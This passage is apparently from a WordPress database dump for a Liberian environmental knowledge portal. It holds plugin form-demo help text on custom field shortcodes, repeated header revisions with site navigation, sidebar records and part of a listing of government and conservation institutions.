field, we define a Custom Field on the \"Edit Form\" screen in the \"Custom Fields\" meta box. For this Starter Form, a radio field already is defined and ready for use. If you examine the Custom Fields meta box, you will notice a custom-field definition that looks like this:</p>\n\n<p><code>field#input_radio|radio_inputs#Option 1:Option 2:Option 3|radio_checked#Option 1|data-required#false</code></p>\n\n<p>To the left of that custom-field definition is its shortcode, which for this form looks like this:</p>\n\n[usp_custom_field form=\"starter\" id=\"2\"]\n\n<p>Including that shortcode in the form results in the display of a radio field, as defined by its attributes:</p>\n\n<ul>\n<li>field = the type of field</li>\n<li>desc = description/label for the group of radio inputs</li>\n<li>radio_inputs = the radio options, separated by a colon :</li>\n<li>radio_checked = the option that should be selected by default</li>\n<li>data-required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-custom-radio-fields/\">Learn more about custom radio fields</a>.</p>\n\n\n\n<h3>Select Field</h3>\n\n<p>To add a custom select field, we define a Custom Field on the \"Edit Form\" screen in the \"Custom Fields\" meta box. For this Starter Form, a select field already is defined and ready for use. If you examine the Custom Fields meta box, you will notice a custom-field definition that looks like this:</p>\n\n<p><code>field#select|options#null:Option 1:Option 2:Option 3|option_default#Please Select..|option_select#null|label#Options|data-required#false</code></p>\n\n<p>To the left of that custom-field definition is its shortcode, which for this form looks like this:</p>\n\n[usp_custom_field form=\"starter\" id=\"3\"]\n\n<p>Including that shortcode in the form results in the display of a select field, as defined by its attributes:</p>\n\n<ul>\n<li>field = the type of field</li>\n<li>options = list of options (include null for an empty option)</li>\n<li>option_default = text to use for the null/empty field (default: \"Please select...\")</li>\n<li>option_select = the option that should be selected by default</li>\n<li>label = the field label</li>\n<li>data-required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-custom-select-fields/\">Learn more about custom select fields</a>.</p>\n\n\n\n<h3>Text Field</h3>\n\n<p>To add a custom text field, we define a Custom Field on the \"Edit Form\" screen in the \"Custom Fields\" meta box. For this Starter Form, a text field already is defined and ready for use. If you examine the Custom Fields meta box, you will notice a custom-field definition that looks like this:</p>\n\n<p><code>label#Text Field|placeholder#Text Field|data-required#false</code></p>\n\n<p>To the left of that custom-field definition is its shortcode, which for this form looks like this:</p>\n\n[usp_custom_field form=\"starter\" id=\"4\"]\n\n<p>Including that shortcode in the form results in the display of a text field, as defined by its attributes:</p>\n\n<ul>\n<li>label = the field label</li>\n<li>placeholder = the field placeholder</li>\n<li>data-required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-custom-text-field/\">Learn more about custom text fields</a>.</p>\n\n\n\n<h3>Textarea</h3>\n\n<p>To add a custom textarea, we define a Custom Field on the \"Edit Form\" screen in the \"Custom Fields\" meta box. For this Starter Form, a textarea already is defined and ready for use. If you examine the Custom Fields meta box, you will notice a custom-field definition that looks like this:</p>\n\n<p><code>field#textarea|label#Textarea|placeholder#Textarea|data-required#false</code></p>\n\n<p>To the left of that custom-field definition is its shortcode, which for this form looks like this:</p>\n\n[usp_custom_field form=\"starter\" id=\"5\"]\n\n<p>Including that shortcode in the form results in the display of a textarea field, as defined by its attributes:</p>\n\n<ul>\n<li>field = the type of field</li>\n<li>label = the field label</li>\n<li>placeholder = the field placeholder</li>\n<li>data-required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-custom-textarea/\">Learn more about custom textarea fields</a>.</p>\n\n\n\n<h3>Custom Files Field</h3>\n\n<p>To add a custom Files field, we define a Custom Field on the \"Edit Form\" screen in the \"Custom Fields\" meta box. For this Starter Form, a Files field already is defined and ready for use. If you examine the Custom Fields meta box, you will notice a custom-field definition that looks like this:</p>\n\n<p><code>field#input_file|label#Custom Files|multiple#true|data-required#false</code></p>\n\n<p>To the left of that custom-field definition is its shortcode, which for this form looks like this:</p>\n\n[usp_custom_field form=\"starter\" id=\"6\"]\n\n<p>Including that shortcode in the form results in the display of a custom Files field, as defined by its attributes:</p>\n\n<ul>\n<li>field = the type of field</li>\n<li>label = the field label</li>\n<li>multiple = whether to allow user to select multiple files</li>\n<li>data-required = whether or not the field is required</li>\n</ul>\n\n<p><a href=\"https://plugin-planet.com/usp-pro-multiple-file-upload-fields/\">Learn more about custom Files fields</a> and visit the USP Uploads settings to set the default/global Files options (like min/max files, min/max size, et al).</p>\n\n\n\n<h3>More types of custom fields</h3>\n\n<p>Check out the <a href=\"https://plugin-planet.com/usp-pro-shortcodes/#custom-fields\">Custom Fields Shortcode Reference</a> to add many other types of fields, including password, url, search, email, tel, month, week, time, datetime, datetime-local, color, date, range, and number. Tip: you can use the \"USP:Custom\" Quicktag to insert any Custom Field into the form.</p>\n\n\n\n<h2>Other Fields and Items</h2>\n\n<p>In addition to the fields we have covered so far, here are a few more fields and items that may be added to any USP Form.</p>\n\n<h3>Fieldset</h3>\n\n<p>By default, each form input is wrapped in a fieldset tag. If you disable this behavior in the plugin settings, you can use the \"USP:Fieldset\" Quicktag to add fieldset tags manually, anywhere in the form. <a href=\"https://plugin-planet.com/usp-pro-customize-fieldsets/\">Learn more</a>.</p>\n\n<h3>Reset Link</h3>\n\n<p>The \"USP:Reset\" Quicktag makes it easy to add a \"reset\" link to the form. <a href=\"https://plugin-planet.com/usp-pro-add-link-reset-form/\">Learn more</a>.</p>\n\n<h3>Remember Info</h3>\n\n<p>The \"USP:Remember\" Quicktag makes it easy to add a \"Remember info\" checkbox to any form. That way, if the form is submitted and returns an error, the user information will be \"remembered\" automatically. <a href=\"https://plugin-planet.com/usp-pro-add-remember-me-checkbox/\">Learn more</a>.</p>\n\n[usp_remember label=\"Remember Form Info\"]\n\n<h3>Custom Redirect</h3>\n\n<p>The \"USP:Redirect\" makes it easy to specify a custom redirect URL. Adding this to the form tells USP Pro to redirect the user to the redirect URL once the form is submitted successfully. <a href=\"https://plugin-planet.com/usp-pro-custom-redirects/\">Learn more</a>.</p>\n\n<h3>Submit Button</h3>\n\n<p>By default, a submit button is added to each form. If you disable this behavior in the plugin settings, you can use the \"USP:Submit\" Quicktag to add a submit button manually, anywhere in the form. <a href=\"https://plugin-planet.com/usp-pro-add-submit-button/\">Learn more</a>.</p>\n\n\n\n<h2>Notes</h2>\n\n<p>To learn more about USP Pro, check out the <a href=\"https://plugin-planet.com/docs/usp/\">documentation at Plugin Planet</a>. You also can find a list of useful resources in the plugin settings, under the \"Tools\" tab, in the \"Helpful Resources\" section. Before submitting this form (yes, it is an actual working form!), make sure to complete the few required fields: Post Title, Post Content, the Captcha, and Agree to Terms. You can fill out other fields as well, to see how they work.</p>\n\n<p>Note: this is a post-submission form. To create and customize other types of forms, like registration forms and contact forms, check out the other USP Form Demos, located on the USP Forms menu in the WP Admin Area. You can also make combo forms, as explained in this tutorial for <a href=\"https://plugin-planet.com/usp-pro-contact-submit-register/\">making a combo contact, submit, and register form</a>.</p>\n\n<p>One more note: if you try submitting this Starter Form without completing the required fields, an error message for each required field will be displayed at the top of the screen. You can customize these errors in the USP More settings, in the \"Primary Field Errors\" section. <a href=\"https://plugin-planet.com/usp-pro-customize-error-messages/\">Learn more</a>.</p>\n\n<p>If you notice any typos or errors in this Starter Form, please <a href=\"https://plugin-planet.com/#contact\">report them</a>. Thank you!</p>\n\n\n\n','Starter Form Demo','','draft','closed','closed','','starter','','','2019-11-16 04:07:28','0000-00-00 00:00:00','',0,'https://ekmsliberia.info/?post_type=usp_form&p=2432',0,'usp_form','',0),(2434,1,'2019-11-16 10:08:25','2019-11-16 10:08:25','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Sign up, It\'s Free\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-2381\"><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-16 10:08:25','2019-11-16 10:08:25','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2435,1,'2019-11-16 10:09:49','2019-11-16 10:09:49','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Sign up, It\'s Free\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-2381\"><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-16 10:09:49','2019-11-16 10:09:49','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2436,1,'2019-11-16 10:12:12','2019-11-16 10:12:12','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Sign up, It\'s Free\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-2381\"><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-16 10:12:12','2019-11-16 10:12:12','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2437,1,'2019-11-16 10:12:43','2019-11-16 10:12:43','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Sign up, It\'s Free\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-2381\"><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-16 10:12:43','2019-11-16 10:12:43','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2445,1,'2019-11-16 11:25:41','2019-11-16 11:25:41','','Categories Sidebar','','publish','closed','closed','','categories-sidebar-2','','','2019-11-16 11:25:41','2019-11-16 11:25:41','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2445',0,'sidebar','',0),(2446,1,'2019-11-16 11:23:13','2019-11-16 11:23:13','','','','publish','closed','closed','','2446','','','2019-11-16 11:23:13','2019-11-16 11:23:13','',2445,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2446',1,'condition_group','',0),(2447,1,'2019-11-16 11:23:28','2019-11-16 11:23:28','','','','publish','closed','closed','','2447','','','2019-11-16 11:23:28','2019-11-16 11:23:28','',2445,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2447',1,'condition_group','',0),(2450,1,'2019-11-16 12:23:44','2019-11-16 12:23:44','','Institutions Sidebar','','publish','closed','closed','','institutions-sidebar','','','2019-11-18 11:42:51','2019-11-18 11:42:51','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2450',0,'sidebar','',0),(2451,1,'2019-11-16 12:10:09','2019-11-16 12:10:09','','','','publish','closed','closed','','2451','','','2019-11-16 19:26:21','2019-11-16 19:26:21','',2450,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2451',1,'condition_group','',0),(2453,1,'2019-11-16 12:33:29','2019-11-16 12:33:29','','Institutions Categories','','publish','closed','closed','','institutions_category','','','2019-11-16 12:33:47','2019-11-16 12:33:47','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=2453',0,'_pods_pod','',0),(2455,1,'2019-11-16 12:47:13','2019-11-16 12:47:13','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ffi.png\" alt=\"Fauna &amp; Flora International\" width=\"1024\" height=\"504\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/conservation-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ci.jpg\" alt=\"Conservation International\" width=\"1024\" height=\"523\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme.jpg\" alt=\"Ministry of Mines and Energy\" width=\"1024\" height=\"482\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Featured_lla.jpg\" alt=\"Liberia Land Authority\" width=\"1024\" height=\"502\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fda0.jpg\" alt=\"Forestry Development Authority\" width=\"1024\" height=\"531\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_epa.jpg\" alt=\"Environmental Protection Agency\" width=\"1024\" height=\"563\"></a><a 